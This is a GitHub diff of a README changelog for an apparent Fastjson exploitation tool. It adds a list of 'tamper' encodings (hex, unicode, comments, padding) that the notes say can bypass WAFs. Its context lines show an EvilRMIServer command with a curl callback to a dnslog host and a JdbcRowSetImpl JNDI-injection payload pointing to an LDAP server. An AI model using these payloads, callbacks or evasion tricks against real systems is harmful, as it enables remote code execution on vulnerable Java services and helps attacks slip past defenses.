File tree Expand file tree Collapse file tree 1 file changed +19
-2
lines changed Expand file tree Collapse file tree 1 file changed +19
-2
lines changed Original file line number Diff line number Diff line change @@ -16,8 +16,25 @@ java -cp fastjson_tool.jar fastjson.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.
16
16
java -cp fastjson_tool.jar fastjson.Tamper "{\"abc\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1099/Object\",\"autoCommit\":true}}"
17
17
18
18
2021-03-31 新增:
19
- fastjson.Tamper : fastjson的一些特性,可以绕一些WAF
20
- fastjson.LDAPRefServerAuto : 新增了一些场景的回显, 选择payload的地址增加了自定义,格式: payload={.........}
19
+ 1.fastjson.Tamper : fastjson的一些特性,可以绕一些WAF
20
+ [-] tamper list:
21
+ tohex
22
+ tounicode
23
+ tohexunicode
24
+ randomhex
25
+ randomunicode
26
+ addis
27
+ addcomment
28
+ addmorecomment
29
+ addcommas
30
+ addrandomx
31
+ add-
32
+ add_
33
+ addsize 填充内容
34
+
35
+ tamper支持多个,但有些不能一起用,多个注意使用的先后顺序,例如 tohex,addcomment
36
+
37
+ 2.fastjson.LDAPRefServerAuto : 新增了一些场景的回显, 选择payload的地址增加了自定义,格式: payload={.........}
21
38
22
39
23
40
2020-10-30 新增:
You can’t perform that action at this time.
0 commit comments